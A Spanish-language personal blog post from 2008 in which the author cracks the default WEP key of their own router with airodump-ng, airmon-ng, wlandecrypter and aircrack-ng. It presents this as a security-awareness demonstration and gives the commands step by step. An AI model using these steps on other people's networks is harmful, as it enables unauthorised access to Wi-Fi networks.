A mis visitantes

Bueno deciros que este blog lo puse por que me hacia falta a mi ya que tengo un modulo de memoria parciamente estropeado y olvido muchas cosas, si crees que algo de aqui te ayudara en alguna configuracion pues usalo sin problemas, tambien deciros que si dejais comentarios os respondere lo mas prontito que pueda.

Un saludo y gracias por su visita ;)

jueves, 18 de diciembre de 2008

Testeando la seguridad de mi router wifi con Mandriva Linux 2009 Free

Con esta aportacion no pretendo enseñar como entrar en una red ajena, lo que quiero es demostrar lo facil que es para concienciar a la gente que no deben de fiarse de la clave que viene por defecto en nuestros routers.

No quiero que nadie mal interprete este documento y por ello lo dejo bien claro.

¡ESTO NO ES UN MANUAL!


Poniendonos en situación:
Mi router BSSID = WLAN_93
Mi router MAC = xx:xx:xx:xx:xx:xx
Esta practica la he llevado a cabo con MI ROUTER y en MI CASA.

Manos a la obra.

Arranqué el airodump-ng y observe la redes cercanas

#airodump-ng eth1


Entonces entre la redes que aparecieron vi la mia en la lista

[CH 9 ][ Elapsed: 4 s ][ 2008-12-18 19:53

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx 34 0 9 WLAN_93

BSSID STATION PWR Lost Packets Probes


Así que cambié mi tarjeta de red inalambrica a modo "Monitor". En este modo puede ver todo el trafico que pase a traves de ella.

#airmon-ng start eth1

Ahora que tenia la inalambrica en modo "Monitor" podia escuchar el trafico de mi red inalambrica y podria capturar algun paquete con la clave WEP de mi router.

El formato es sencillo
[comado] --bssid MAC -canal -w ficheroaguardarcapturas dispositivoderedinalambrico

#airodump-ng --bssid xx:xx:xx:xx:xx:xx -c 6 -w WLAN93 eth1

Y esto es lo que sale:

CH 3 ][ Elapsed: 0 s ][ 2008-12-19 14:40

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx 0 12 0 0 9 54. WEP WEP WLAN_93

BSSID STATION PWR Lost Packets Probes

Hay que capturar al menos 180 paquetes de datos (Donde pone DATA) pero hay veces que con menos lo sacas.

Una vez optenidos los paquetes, me cree un diccionario con el programa wlandecrypter así:

#wlandecrypter xx:xx:xx:xx:xx:xx WLAN_93 diccionario

Basicamente lo que hace es crear un listado de posibles claves WEP basandose en el estandar usado por el fabricante o el distribuidor. Ahora solo quedaba saber si el programa se sabia mi clave.

#aircrack-ng -w diccionario WLAN93.cap

Sopresa!! Hay estaba mi clave WEP del router y solo tardé tres minutos en sacarla, asi pues decidí cambiarla por algo mas dificil. Desde entonces duermo mejor ;)

Por supuesto hay mas formas de hacerlo, pero esta ya deberia de ponernos en guardia, la pregunta no es cuales son las otras formas sino ¿Eres tu una victima?.

Saludos a todos.

No hay comentarios: